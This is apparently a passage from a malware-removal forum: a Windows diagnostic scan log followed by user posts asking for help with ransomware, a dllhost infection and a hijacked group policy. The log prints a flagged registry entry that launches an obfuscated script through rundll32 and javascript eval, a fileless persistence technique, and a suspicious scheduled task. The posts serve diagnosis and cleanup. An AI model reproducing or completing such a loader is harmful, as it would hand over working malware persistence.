(HKLM\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Mozilla Firefox 31.0 (x86 en-US) (HKLM\...\Mozilla Firefox 31.0 (x86 en-US)) (Version: 31.0 - Mozilla) Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 29.0.1 - Mozilla) MSVCRT (Version: 15.4.2862.0708 - Microsoft) Hidden MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation) MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation) NTRU TCG Software Stack (Version: 2.1.34 - Security Innovation) Hidden NVIDIA Control Panel 327.62 (Version: 327.62 
- NVIDIA Corporation) Hidden NVIDIA Graphics Driver 327.62 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 327.62 - NVIDIA Corporation) NVIDIA Install Application (Version: 2.1002.141.953 - NVIDIA Corporation) Hidden NVIDIA nView 140.75 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NView) (Version: 140.75 - NVIDIA Corporation) NVIDIA Optimus 1.14.17 (Version: 1.14.17 - NVIDIA Corporation) Hidden NVIDIA Update Components (Version: 1.14.17 - NVIDIA Corporation) Hidden Office 15 Click-to-Run Extensibility Component (Version: 15.0.4641.1003 - Microsoft Corporation) Hidden Office 15 Click-to-Run Licensing Component (Version: 15.0.4641.1003 - Microsoft Corporation) Hidden Office 15 Click-to-Run Localization Component (Version: 15.0.4641.1003 - Microsoft Corporation) Hidden PC-CCID (Version: 2.0.0 - Gemalto) Hidden Preboot Manager (Version: 03.02.00.066 - Wave Systems Corp.) Hidden Private Information Manager (Version: 07.00.00.026 - Wave Systems Corp.) Hidden Rosetta Stone Ltd Services (HKLM\...\{3165E4A6-D5DE-46B0-8597-D55E2B826B84}) (Version: 3.2.21 - Rosetta Stone Ltd.) Rosetta Stone TOTALe (HKLM\...\{6B6BC189-D606-4BC7-9758-E6C364F76A55}) (Version: 4.5.5.0 - Rosetta Stone, Ltd) Search Protect (HKLM\...\SearchProtect) (Version: 2.11.11.7 - Conduit) <==== ATTENTION Shopping App by Ask (HKLM\...\{4F524A2D-5354-2D53-5045-A758B70C1002}) (Version: 12.16.2.54 - APN, LLC) Skype™ 6.20 (HKLM\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 6.20.104 - Skype Technologies S.A.) SPBA 5.9 (Version: 5.9.4.6686 - UPEK Inc.) Hidden Stellarium 0.12.4 (HKLM\...\Stellarium_is1) (Version: 0.12.4 - Stellarium team) Trusted Drive Manager (Version: 4.0.5.8 - Wave Systems Corp.) Hidden Upek Touchchip Fingerprint Reader (Version: 1.2.004 - Dell Inc.) 
Hidden Wave Infrastructure Installer (Version: 07.02.40.0008 - Wave Systems Corp) Hidden Wave Support Software Installer (Version: 05.12.00.012 - Wave Systems Corp) Hidden WIDCOMM Bluetooth Software (HKLM\...\{436E0B79-2CFB-4E5F-9380-E17C1B25D0C5}) (Version: 6.3.0.6900 - Broadcom Corporation) Windows Driver Package - Dell Inc. PBADRV System (09/11/2009 1.0.1.6) (HKLM\...\9512AA21B791B05A54E27065C45BBC417AB282DF) (Version: 09/11/2009 1.0.1.6 - Dell Inc.) Windows Live Communications Platform (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden Windows Live Essentials (HKLM\...\WinLiveSuite) (Version: 15.4.3508.1109 - Microsoft Corporation) Windows Live Essentials (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden Windows Live ID Sign-in Assistant (Version: 7.250.4225.0 - Microsoft Corporation) Hidden Windows Live Installer (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden Windows Live Mail (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden Windows Live Messenger (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden Windows Live MIME IFilter (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden Windows Live Movie Maker (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden Windows Live Photo Common (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden Windows Live Photo Gallery (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden Windows Live PIMT Platform (Version: 15.4.3508.1109 - Microsoft Corporation) Hidden Windows Live SOXE (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden Windows Live SOXE Definitions (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden Windows Live UX Platform (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden Windows Live UX Platform Language Pack (Version: 15.4.3508.1109 - Microsoft Corporation) Hidden Windows Live Writer (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden Windows Live Writer Resources (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden ==================== 
Custom CLSID (selected items): ========================== (If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.) CustomCLSID: HKU\S-1-5-21-475017880-3412151489-2877756071-1003_Classes\CLSID\{7B37E4E2-C62F-4914-9620-8FB5062718CC}\localserver32 -> C:\Users\Nikki\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe (Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-475017880-3412151489-2877756071-1003_Classes\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}\InprocServer32 -> C:\Users\Nikki\AppData\Local\Microsoft\SkyDrive\17.0.4023.1211\SkyDriveShell.dll (Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-475017880-3412151489-2877756071-1003_Classes\CLSID\{AB807329-7324-431B-8B36-DBD581F56E0B}\localserver32 -> C:\Users\Nikki\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe (Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-475017880-3412151489-2877756071-1003_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks? 
CustomCLSID: HKU\S-1-5-21-475017880-3412151489-2877756071-1003_Classes\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}\InprocServer32 -> C:\Users\Nikki\AppData\Local\Microsoft\SkyDrive\17.0.4023.1211\SkyDriveShell.dll (Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-475017880-3412151489-2877756071-1003_Classes\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}\InprocServer32 -> C:\Users\Nikki\AppData\Local\Microsoft\SkyDrive\17.0.4023.1211\SkyDriveShell.dll (Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-475017880-3412151489-2877756071-1003_Classes\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}\InprocServer32 -> C:\Users\Nikki\AppData\Local\Microsoft\SkyDrive\17.0.4023.1211\SkyDriveShell.dll (Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-475017880-3412151489-2877756071-1003_Classes\CLSID\{F8071786-1FD0-4A66-81A1-3CBE29274458}\InprocServer32 -> C:\Users\Nikki\AppData\Local\Microsoft\SkyDrive\17.0.4023.1211\FileSyncApi.dll (Microsoft Corporation) ==================== Restore Points ========================= ==================== Hosts content: ========================== (If needed Hosts: directive could be included in the fixlist to reset Hosts.) 2009-07-13 22:04 - 2009-06-10 17:39 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts ==================== Scheduled Tasks (whitelisted) ============= (If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.) Task: {0CDB2C79-CAE5-468E-9E2D-4189D7879701} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Microsoft Office 15\ClientX86\OfficeC2RClient.exe [2014-07-31] (Microsoft Corporation) Task: {3E124A1D-E97D-42DD-B565-CB02F622EE3B} - System32\Tasks\{9678620C-B7FF-D3EA-61BE-4E6BDD97CD72} => C:\Windows\system32\wosyw.dll [2014-09-23] () Task: {5B87279C-2CA5-4793-8CC5-331E71905A9A} - System32\Tasks\GoogleUpdateTaskMachineUA1cfbb01ef80f922 => C:\Program Files\Google\Update\GoogleUpdate.exe [2014-08-18] (Google Inc.) 
Task: {6AB08C04-688B-49A7-B94C-3D73445E1FD7} - System32\Tasks\GoogleUpdateTaskMachineCore1cfbb013a16b54f => C:\Program Files\Google\Update\GoogleUpdate.exe [2014-08-18] (Google Inc.) Task: {6CAE4A3E-ADE6-4CF7-86CA-7F8CCF6B3988} - System32\Tasks\Time Trigger Test Task => C:\Users\Nikki\AppData\Local\Temp\yiivdqo.exe <==== ATTENTION Task: {FAF5FD9A-FD08-4431-94D6-CE7B46BEC4E3} - System32\Tasks\Microsoft Office 15 Sync Maintenance for LAPTOP-NIKKI-Nikki Laptop-Nikki => C:\Program Files\Microsoft Office 15\Root\Office15\MsoSync.exe [2014-08-26] (Microsoft Corporation) Task: {FDF0D188-9609-4169-AFC2-5A0400F84111} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-14] (Adobe Systems Incorporated) (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.) Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore1cfbb013a16b54f.job => C:\Program Files\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA1cfbb01ef80f922.job => C:\Program Files\Google\Update\GoogleUpdate.exe ==================== Loaded Modules (whitelisted) ============= 2014-03-08 16:17 - 2013-10-28 19:22 - 00088864 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax.dll 2014-03-08 02:40 - 2014-05-20 03:11 - 00080040 _____ () C:\Program Files\Microsoft Office 15\ClientX86\ApiClient.dll 2010-10-15 20:14 - 2010-10-15 20:14 - 00132384 _____ () C:\Program Files\WIDCOMM\Bluetooth Software\btkeyind.dll 2014-02-18 19:50 - 2011-06-10 13:36 - 00094208 _____ () C:\Windows\System32\IccLibDll.dll 2014-02-18 18:09 - 2010-12-17 12:24 - 00686704 _____ () C:\Program Files\STMicroelectronics\AccelerometerP11\FF_Protection.exe 2014-06-20 17:48 - 2014-06-20 17:48 - 00316584 _____ () C:\Program Files\Microsoft Office 
15\Root\Office15\AppVIsvStream32.dll ==================== Alternate Data Streams (whitelisted) ========= (If an entry is included in the fixlist, only the Alternate Data Streams will be removed.) ==================== Safe Mode (whitelisted) =================== (If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Wdf01000.sys => ""="Driver" ==================== EXE Association (whitelisted) ============= (If an entry is included in the fixlist, the default will be restored. None default entries will be removed.) ==================== MSCONFIG/TASK MANAGER disabled items ========= (Currently there is no automatic fix for this section.) ==================== Faulty Device Manager Devices ============= ==================== Event log errors: ========================= Application errors: ================== Error: (09/24/2014 03:56:41 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: iexplore.exe, version: 11.0.9600.17280, time stamp: 0x4a5bc6b7 Faulting module name: MSHTML.dll, version: 11.0.9600.17280, time stamp: 0x53f27d67 Exception code: 0xc0000005 Fault offset: 0x00140273 Faulting process id: 0x2960 Faulting application start time: 0xiexplore.exe0 Faulting application path: iexplore.exe1 Faulting module path: iexplore.exe2 Report Id: iexplore.exe3 Error: (09/24/2014 03:54:04 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: svchost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc100 Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000 Exception code: 0xc0000005 Fault offset: 0x013d1138 Faulting process id: 0x2e50 Faulting application start time: 0xsvchost.exe0 Faulting application path: svchost.exe1 Faulting module path: svchost.exe2 Report Id: svchost.exe3 
Error: (09/24/2014 03:41:03 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: svchost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc100 Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000 Exception code: 0xc0000005 Fault offset: 0x008e1138 Faulting process id: 0x212c Faulting application start time: 0xsvchost.exe0 Faulting application path: svchost.exe1 Faulting module path: svchost.exe2 Report Id: svchost.exe3 Error: (09/24/2014 03:39:37 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: svchost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc100 Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000 Exception code: 0xc0000005 Fault offset: 0x007f1138 Faulting process id: 0x1294 Faulting application start time: 0xsvchost.exe0 Faulting application path: svchost.exe1 Faulting module path: svchost.exe2 Report Id: svchost.exe3 Error: (09/24/2014 03:39:34 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 Error: (09/24/2014 03:36:37 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: svchost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc100 Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000 Exception code: 0xc0000005 Fault offset: 0x004c1138 Faulting process id: 0x26a0 Faulting application start time: 0xsvchost.exe0 Faulting application path: svchost.exe1 Faulting module path: svchost.exe2 Report Id: svchost.exe3 Error: (09/24/2014 03:21:02 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: svchost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc100 Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000 Exception code: 0xc0000005 Fault offset: 
0x012b1138 Faulting process id: 0x1104 Faulting application start time: 0xsvchost.exe0 Faulting application path: svchost.exe1 Faulting module path: svchost.exe2 Report Id: svchost.exe3 Error: (09/24/2014 03:14:04 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 Error: (09/24/2014 02:55:47 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: svchost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc100 Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000 Exception code: 0xc0000005 Fault offset: 0x004c1138 Faulting process id: 0x2d90 Faulting application start time: 0xsvchost.exe0 Faulting application path: svchost.exe1 Faulting module path: svchost.exe2 Report Id: svchost.exe3 Error: (09/24/2014 02:46:27 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 System errors: ============= Error: (09/24/2014 03:40:34 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY) Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC) Error: (09/24/2014 03:40:06 AM) (Source: DCOM) (EventID: 10010) (User: ) Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} Error: (09/24/2014 03:38:58 AM) (Source: Service Control Manager) (EventID: 7001) (User: ) Description: The NTRU TSS v1.2.1.34 TCS service depends on the TPM Base Services service which failed to start because of the following error: %%0 Error: (09/24/2014 03:15:05 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY) Description: 
application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC) Error: (09/24/2014 03:14:35 AM) (Source: DCOM) (EventID: 10010) (User: ) Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} Error: (09/24/2014 03:13:22 AM) (Source: Service Control Manager) (EventID: 7001) (User: ) Description: The NTRU TSS v1.2.1.34 TCS service depends on the TPM Base Services service which failed to start because of the following error: %%0 Error: (09/24/2014 02:47:05 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY) Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC) Error: (09/24/2014 02:46:39 AM) (Source: DCOM) (EventID: 10010) (User: ) Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} Error: (09/24/2014 02:46:17 AM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: The Windows Media Player Network Sharing Service service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 30000 milliseconds: Restart the service. 
Error: (09/24/2014 02:45:55 AM) (Source: Service Control Manager) (EventID: 7001) (User: ) Description: The NTRU TSS v1.2.1.34 TCS service depends on the TPM Base Services service which failed to start because of the following error: %%0 Microsoft Office Sessions: ========================= Error: (09/24/2014 03:56:41 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: iexplore.exe11.0.9600.172804a5bc6b7MSHTML.dll11.0.9600.1728053f27d67c000000500140273296001cfd7ccc08d0cb1C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll5168a9fa-43c0-11e4-8ecd-d0df9a3b4321 Error: (09/24/2014 03:54:04 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: svchost.exe6.1.7600.163854a5bc100unknown0.0.0.000000000c0000005013d11382e5001cfd7cc71e836f6C:\Windows\system32\svchost.exeunknownf4044896-43bf-11e4-8ecd-d0df9a3b4321 Error: (09/24/2014 03:41:03 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: svchost.exe6.1.7600.163854a5bc100unknown0.0.0.000000000c0000005008e1138212c01cfd7cae18192c2C:\Windows\system32\svchost.exeunknown221cf317-43be-11e4-8ecd-d0df9a3b4321 Error: (09/24/2014 03:39:37 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: svchost.exe6.1.7600.163854a5bc100unknown0.0.0.000000000c0000005007f1138129401cfd7cab03f0adaC:\Windows\system32\svchost.exeunknownef425be2-43bd-11e4-8ecd-d0df9a3b4321 Error: (09/24/2014 03:39:34 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 Error: (09/24/2014 03:36:37 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: svchost.exe6.1.7600.163854a5bc100unknown0.0.0.000000000c0000005004c113826a001cfd7ca425d2cdaC:\Windows\system32\svchost.exeunknown8369c1ec-43bd-11e4-a2a7-d0df9a3b4321 Error: (09/24/2014 03:21:02 AM) (Source: Application Error) (EventID: 1000) (User: ) 
Description: svchost.exe6.1.7600.163854a5bc100unknown0.0.0.000000000c0000005012b1138110401cfd7c72096cbf7C:\Windows\system32\svchost.exeunknown5616a442-43bb-11e4-a2a7-d0df9a3b4321 Error: (09/24/2014 03:14:04 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 Error: (09/24/2014 02:55:47 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: svchost.exe6.1.7600.163854a5bc100unknown0.0.0.000000000c0000005004c11382d9001cfd7c4793cc1d8C:\Windows\system32\svchost.exeunknowncfa8f17b-43b7-11e4-8ed8-d0df9a3b4321 Error: (09/24/2014 02:46:27 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 ==================== Memory info =========================== Processor: Intel® Core i5-2520M CPU @ 2.50GHz Percentage of memory in use: 95% Total physical RAM: 3241.02 MB Available physical RAM: 155.8 MB Total Pagefile: 7408.45 MB Available Pagefile: 1118.56 MB Total Virtual: 2047.88 MB Available Virtual: 1922.06 MB ==================== Drives ================================ Drive c: (OSDisk) (Fixed) (Total:232.88 GB) (Free:192.73 GB) NTFS ==>[Drive with boot components (obtained from BCD)] Drive h: () (Removable) (Total:29.91 GB) (Free:29.89 GB) FAT32 ==================== MBR & Partition Table ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or 8) (Size: 232.9 GB) (Disk ID: 000CD844) Partition 1: (Active) - (Size=232.9 GB) - (Type=07 NTFS) Partition 00: (Not Active) - (Size=0) - (Type=00) ATTENTION ===> 0 byte partition bootkit. ======================================================== Disk: 1 (Size: 29.9 GB) (Disk ID: 00000000) Partition: GPT Partition Type. 
==================== End Of Log ============================
  22. I have a Lenovo T410 laptop running Windows 7 Professional (Svc.Pack 1), 64-bit, and it has been hacked with some kind of encryption virus, and most of the files are encrypted with the '.crypted' extension. Could anyone please suggest what needs to be done to remove the virus? This attack happened a couple of days after the "dllhost" virus attack, and when my computer's Wi-Fi was left on for a couple of hours (dllhost was active and attracting more viruses when my internet connection was on). #1) I have taken outside help to remove the "dllhost" virus, but unfortunately they were not able to decrypt the files. #2) How do I ensure that the "dllhost" virus is gone and won't come back? Is there a security patch that I can use? Any help or suggestions are appreciated. Thanks.
  23. Please help with dllhost.exe *32 COM surrogate removal. Please see enclosed FRST and Addition files. Need fixlist.txt file. Thanks! FRST.txt Addition.txt
  24. I receive a group policy block after a virus or malware added group policy. On the user profile, Malwarebytes picks up malicious websites like 4682b4.com and other IP addresses. This is not the case when I log on as the administrator.